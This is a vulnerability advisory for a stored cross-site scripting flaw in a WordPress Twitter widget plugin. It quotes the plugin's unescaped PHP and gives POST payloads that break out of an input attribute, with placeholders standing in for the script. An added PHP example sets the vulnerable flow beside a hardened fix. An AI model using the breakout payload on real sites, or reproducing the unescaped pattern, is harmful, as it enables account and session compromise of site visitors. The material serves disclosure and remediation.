
30.06.2009, 19:08
WordPress Plugin Advanced Twitter Widget 1.0.2 XSS Vuln
http://wordpress.org/extend/plugins/advanced-twitter-widget/
\advanced-twitter-widget.php
(c)eLwaux 30.06.2009, uasc.org.ua
PHP code (advanced-twitter-widget.php, lines 89-112, excerpted; elided lines marked with `// ...`):
if($_POST['advanced_twitter_widget_value']!=""){
    // the four widget settings are taken straight from POST, with no sanitization
    $xArrOptions[0]= $_POST['advanced_twitter_widget_title'];
    $xArrOptions[1]= $_POST['advanced_twitter_widget_value'];
    $xArrOptions[2]= $_POST['advanced_twitter_widget_type'];
    $xArrOptions[3]= $_POST['advanced_twitter_widget_count'];
    // and persisted as-is in the options table (stored XSS, survives across requests)
    update_option('advanced_twitter_widget_options', serialize($xArrOptions));
}
// ...
$xArrOptions = unserialize(get_option('advanced_twitter_widget_options'));
// ...
$xTitle = $xArrOptions[0];
$xValue = $xArrOptions[1];
$xType = $xArrOptions[2];
$xCount = $xArrOptions[3];
// ...
// the stored values are echoed unescaped into HTML attributes (no esc_attr())
Title:<br/><input type="text" name="advanced_twitter_widget_title" value="<?php echo $xTitle;?>" /><br/><br/>
Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="<?php echo $xValue;?>" /><br/><br/>
exploit:
Code:
POST: advanced_twitter_widget_value=">{XSS1}<a "
POST: advanced_twitter_widget_title=">{XSS2}<a "
POST: advanced_twitter_widget_type=.
POST: advanced_twitter_widget_count=.
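The payload in the post works because the leading `">` closes the `value=""` attribute and the `<input>` tag, `{XSS1}` / `{XSS2}` stands for whatever markup the attacker wants rendered, and the trailing `<a "` swallows the `" />` that follows in the template. The script below is an added example (not code from the advisory or from the plugin) that reproduces the plugin's flow beside a hardened version of the same form. Because WordPress helpers (`update_option`, `get_option`, `esc_attr`, `sanitize_text_field`, `absint`) are not available outside WordPress, it uses plain-PHP stand-ins and an in-memory serialize/unserialize round trip; the function names `vulnerable_render`, `hardened_render`, `sanitize_text` and `attr`, the `account`/`search` whitelist for the type field and the default count of 5 are assumptions made for the example, not the plugin's own.

```php
<?php
// Added example: stored XSS in a widget settings form, vulnerable vs. hardened.
// Plain-PHP stand-ins are used for the WordPress helpers named in the comments.

// Constructed input, copied from the exploit POST in the advisory.
$post = [
    'advanced_twitter_widget_title' => '">{XSS2}<a "',
    'advanced_twitter_widget_value' => '">{XSS1}<a "',
    'advanced_twitter_widget_type'  => '.',
    'advanced_twitter_widget_count' => '.',
];

// Vulnerable flow, mirroring the plugin: raw POST values are stored and then
// echoed straight into value="" attributes.
function vulnerable_render(array $post): string {
    $opts = [
        $post['advanced_twitter_widget_title'],
        $post['advanced_twitter_widget_value'],
        $post['advanced_twitter_widget_type'],
        $post['advanced_twitter_widget_count'],
    ];
    // stand-in for the update_option()/get_option() round trip
    $stored = unserialize(serialize($opts));
    return 'Title:<br/><input type="text" name="advanced_twitter_widget_title" value="'
         . $stored[0] . '" /><br/>'
         . 'Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="'
         . $stored[1] . '" /><br/>';
}

// Hardened flow: validate on the way in, escape for the HTML-attribute context
// on the way out. Escaping alone closes the XSS; input validation is defence
// in depth and keeps garbage like "." out of the type/count fields.
function hardened_render(array $post): string {
    // In WordPress: sanitize_text_field() for free text
    $title = sanitize_text((string) ($post['advanced_twitter_widget_title'] ?? ''));
    $value = sanitize_text((string) ($post['advanced_twitter_widget_value'] ?? ''));
    // Assumed whitelist for the type field (the form label says "Account/Search")
    $allowedTypes = ['account', 'search'];
    $type = in_array($post['advanced_twitter_widget_type'] ?? '', $allowedTypes, true)
          ? $post['advanced_twitter_widget_type'] : 'account';
    // In WordPress: absint(); assumed default of 5 tweets
    $count = (int) ($post['advanced_twitter_widget_count'] ?? 0);
    if ($count < 1) {
        $count = 5;
    }
    $stored = unserialize(serialize([$title, $value, $type, $count]));
    // In WordPress: esc_attr() around every value echoed into an attribute
    return 'Title:<br/><input type="text" name="advanced_twitter_widget_title" value="'
         . attr($stored[0]) . '" /><br/>'
         . 'Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="'
         . attr($stored[1]) . '" /><br/>'
         . 'Type: ' . attr($stored[2]) . ', Count: ' . (int) $stored[3] . '<br/>';
}

// Rough equivalent of sanitize_text_field(): drop tags and control bytes, trim.
function sanitize_text(string $s): string {
    $s = strip_tags($s);
    $s = preg_replace('/[\x00-\x1F\x7F]/', '', $s);
    return trim($s);
}

// Rough equivalent of esc_attr(): encode ", ', <, > and & for an attribute value.
function attr(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

echo "vulnerable (attribute and tag are broken out of):\n", vulnerable_render($post), "\n\n";
echo "hardened (payload stays inside the attribute as text):\n", hardened_render($post), "\n";
```

Run it with `php example.php`: the vulnerable output contains `value="">{XSS1}<a "" />`, i.e. the attacker's markup is now part of the page, while the hardened output contains `value="&quot;&gt;{XSS1}"`, which the browser shows as literal text in the field. In the real plugin the fix is the same two lines per field: sanitize (or whitelist) on save, and wrap every echoed setting in `esc_attr()`.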